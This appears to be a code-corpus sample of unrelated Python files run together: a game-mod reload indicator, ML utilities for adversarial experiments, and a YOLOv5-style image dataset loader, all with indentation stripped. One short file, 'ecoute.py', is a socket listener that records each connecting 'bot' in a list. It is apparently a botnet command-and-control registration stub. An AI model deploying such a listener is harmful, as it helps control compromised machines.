logger.logDebug("updateVehicleGunReloadTime called. | reload time left: ", timeLeft, " entire reload time: ", baseTime)
# Send new info to thread
Threads.updateReloadIndicator.timeLeft = timeLeft
Threads.updateReloadIndicator.updateTimeLeft = True
# update local values for further calculation
self.CtrlState_prevTimestamp = currentTimeSec()
self.CtrlState_prevTimeLeft = timeLeft
# Send new info to thread
Threads.updateReloadIndicator.baseTime = baseTime
# When there is no thread for the reload indicator already running, start a new one.
# Should only happen on the first call of this method.
if not self.Thread_UpdateReloadIndicator:
self.Thread_UpdateReloadIndicator = threading.Thread(target=Threads.updateReloadIndicator, args=())
self.Thread_UpdateReloadIndicator.start()
logger.logTrace("updateReloadIndicatorThread started.")
def __del__(self):
self.onLeaveWorld()
|
ecoute.py
|
#!/usr/bin/env python
import socket
import threading
def ajout(addr):
print "new bot ", addr
fichier = open("lstbot","r")
with open("lstbot","r") as f:
lines = f.readlines()
with open("lstbot","w") as f:
for line in lines:
if line.split(' ')[0] != addr[0]:
f.write(line)
f.write(addr[0]+" "+str(addr[1])+"\n")
ecoute = socket.socket()
ecoute.setsockopt(\
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
ecoute.bind(('',12222))
while (1):
ecoute.listen(1)
connection, addr = ecoute.accept()
t = threading.Thread(target = ajout,args=(addr,))
t.start()
|
utils_learn.py
|
import argparse
import json
import logging
import math
import os
from os.path import exists, join, split
import threading
import shutil
from fnmatch import filter
from PIL import Image
import torch
from torch import nn
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
# added for adversarial experiment
import torch.nn.functional as F
from distutils.version import LooseVersion
import numpy as np
def clamp_tensor(image, upper_bound, lower_bound):
image = torch.where(image > upper_bound, upper_bound, image)
image = torch.where(image < lower_bound, lower_bound, image)
return image
def back_transform(image, info):
# image = image2.copy()
image[:, 0, :, :] = image[:, 0, :, :] * info["std"][0] + info["mean"][0]
image[:, 1, :, :] = image[:, 1, :, :] * info["std"][1] + info["mean"][1]
image[:, 2, :, :] = image[:, 2, :, :] * info["std"][2] + info["mean"][2]
return image
def forward_transform(image, info):
image[:, 0, :, :] = (image[:, 0, :, :] - info["mean"][0]) / info["std"][0]
image[:, 1, :, :] = (image[:, 1, :, :] - info["mean"][1]) / info["std"][1]
image[:, 2, :, :] = (image[:, 2, :, :] - info["mean"][2]) / info["std"][2]
return image
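# Round-trip sketch (illustrative only; the ImageNet-style mean/std values are
# assumptions, not taken from this code base): forward_transform normalizes a
# batch with the given statistics and back_transform undoes it, so composing
# the two recovers the original tensor up to floating point error.
def _demo_transform_roundtrip():
    info = {"mean": [0.485, 0.456, 0.406], "std": [0.229, 0.224, 0.225]}
    image = torch.rand(1, 3, 4, 4)
    restored = back_transform(forward_transform(image.clone(), info), info)
    return torch.allclose(image, restored, atol=1e-6)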
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
def adjust_learning_rate(args, optimizer, epoch):
"""
    Sets the learning rate according to args.lr_mode ('step', 'poly', or
    'schedule') and applies it to all parameter groups of the optimizer.
"""
if args.lr_mode == 'step':
lr = args.lr * (args.lr_change ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
elif args.lr_mode == 'schedule':
        print('args.step_size_schedule', args.step_size_schedule)
assert len(args.step_size_schedule) == 3
lr = args.step_size_schedule[0][1]
if epoch >= args.step_size_schedule[1][0] and epoch < args.step_size_schedule[2][0]:
lr = args.step_size_schedule[1][1]
elif epoch >= args.step_size_schedule[2][0]:
lr = args.step_size_schedule[2][1]
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
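# Illustrative sketch (not part of the original utilities; the numbers are
# assumptions chosen for demonstration): how the 'poly' mode above decays the
# learning rate, lr(epoch) = base_lr * (1 - epoch / epochs) ** 0.9.
def _demo_poly_lr(base_lr=0.01, epochs=100):
    return [round(base_lr * (1 - epoch / epochs) ** 0.9, 5)
            for epoch in (0, 25, 50, 75)]  # [0.01, 0.00772, 0.00536, 0.00287]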
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
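# Minimal sketch (made-up arrays, illustrative only) of how fast_hist and
# per_class_iu combine into a mean IoU for a two-class problem.
def _demo_mean_iou():
    pred = np.array([0, 0, 1, 1])
    label = np.array([0, 1, 1, 1])
    hist = fast_hist(pred, label, n=2)     # 2x2 confusion matrix
    return np.nanmean(per_class_iu(hist))  # (0.5 + 2/3) / 2 ~= 0.583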
def save_output_images(predictions, filenames, output_dir):
"""
    Saves each prediction in a batch as an individual image file, named after
    the corresponding entry in `filenames`.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
    Saves each prediction in a batch as a color-mapped image file, using the
    given palette and named after the corresponding entry in `filenames`.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar', save_model_path = None):
try:
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, os.path.join(save_model_path, 'model_best.pth.tar'))
except:
for _ in range(30): print("--------------WARNING!!! FAILED TO SAVE. DISK POSSIBLY OUT OF SPACE--------------")
pass
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
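# Usage sketch for AverageMeter (illustrative numbers): track a running loss
# average across mini-batches of different sizes.
def _demo_average_meter():
    meter = AverageMeter()
    meter.update(0.9, n=32)  # batch of 32 samples with mean loss 0.9
    meter.update(0.5, n=16)  # batch of 16 samples with mean loss 0.5
    return meter.avg         # (0.9 * 32 + 0.5 * 16) / 48 ~= 0.767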
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
if correct.size(0) == 0:
pass
# print('c1', correct.size())
correct = correct[target != 255]
correct = correct.view(-1)
if correct.size(0) == 0:
# print('c2', correct.size(), correct)
cor_num = correct.float().sum(0)
score = cor_num.mul(100.0 / 1)
else:
cor_num = correct.float().sum(0)
# print('correc size', correct.size(0))
score = cor_num.mul(100.0 / correct.size(0))
# print('cor num', cor_num, correct.size(0),correct.size())
# return score.data[0]
return score.data.item()
def cross_entropy2d(input, target, weight=None, size_average=True, ignore_index=255):
# input: (n, c, h, w), target: (n, h, w)
n, c, h, w = input.size()
# log_p: (n, c, h, w)
if LooseVersion(torch.__version__) < LooseVersion('0.3'):
# ==0.2.X
log_p = F.log_softmax(input)
else:
# >=0.3
log_p = F.log_softmax(input, dim=1)
# log_p: (n*h*w, c)
log_p = log_p.transpose(1, 2).transpose(2, 3).contiguous()
log_p = log_p[target.view(n, h, w, 1).repeat(1, 1, 1, c) >= 0]
log_p = log_p.view(-1, c)
# target: (n*h*w,)
mask = target >= 0
target = target[mask]
loss = F.nll_loss(log_p, target, weight=weight, reduction='sum', ignore_index=ignore_index)
if size_average:
loss /= mask.data.sum()
return loss
# added for adversarial experiment ends
def fill_up_weights(up):
w = up.weight.data
f = math.ceil(w.size(2) / 2)
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(w.size(2)):
for j in range(w.size(3)):
w[0, 0, i, j] = \
(1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
for c in range(1, w.size(0)):
w[c, 0, :, :] = w[0, 0, :, :]
def include_patterns(*patterns):
"""Factory function that can be used with copytree() ignore parameter.
Arguments define a sequence of glob-style patterns
that are used to specify what files to NOT ignore.
Creates and returns a function that determines this for each directory
in the file hierarchy rooted at the source directory when used with
shutil.copytree().
"""
def _ignore_patterns(path, names):
keep = set(name for pattern in patterns
for name in filter(names, pattern))
ignore = set(name for name in names
if name not in keep and not os.path.isdir(join(path, name)))
return ignore
return _ignore_patterns
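# Usage sketch (illustrative paths; 'src_dir' and 'dst_dir' are assumptions):
# copy a source tree while keeping only python sources and json configs.
def _demo_include_patterns(src='src_dir', dst='dst_dir'):
    shutil.copytree(src, dst, ignore=include_patterns('*.py', '*.json'))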
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=stride,
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
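# Illustrative call sketch (the dataset path, hyperparameter dict `hyp` and the
# `opt` object are assumptions, not values shipped with this file):
#   dataloader, dataset = create_dataloader('../coco128/images/train2017', 640,
#                                           batch_size=16, stride=32, opt=opt,
#                                           hyp=hyp, augment=True)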
class LoadImages: # for inference
def __init__(self, path, img_size=640):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
path = str(Path(path)) # os-agnostic
parent = str(Path(path).parent) + os.sep
if os.path.isfile(path): # file
with open(path, 'r') as f:
f = f.read().splitlines()
f = [x.replace('./', parent) if x.startswith('./') else x for x in f] # local to global path
elif os.path.isdir(path): # folder
f = glob.iglob(path + os.sep + '*.*')
else:
raise Exception('%s does not exist' % path)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except:
raise Exception('Error loading data from %s. See %s' % (path, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Read image shapes (wh)
sp = path.replace('.txt', '') + '.shapes' # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
self.shapes = np.array(s, dtype=np.float64)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
self.imgs = [None] * n
self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
np_labels_path = str(Path(self.label_files[0]).parent) + '.npy' # saved labels in *.npy file
if os.path.isfile(np_labels_path):
s = np_labels_path # print string
x = np.load(np_labels_path, allow_pickle=True)
if len(x) == n:
self.labels = x
labels_loaded = True
else:
s = path.replace('images', 'labels')
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
if labels_loaded:
l = self.labels[i]
# np.savetxt(file, l, '%g') # save *.txt from *.npy file
else:
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
s, nf, nm, ne, nd, n)
assert nf > 0 or n == 20288, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
if not labels_loaded and n > 1000:
print('Saving labels to %s for faster future loading' % np_labels_path)
np.save(np_labels_path, self.labels) # save for next time
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
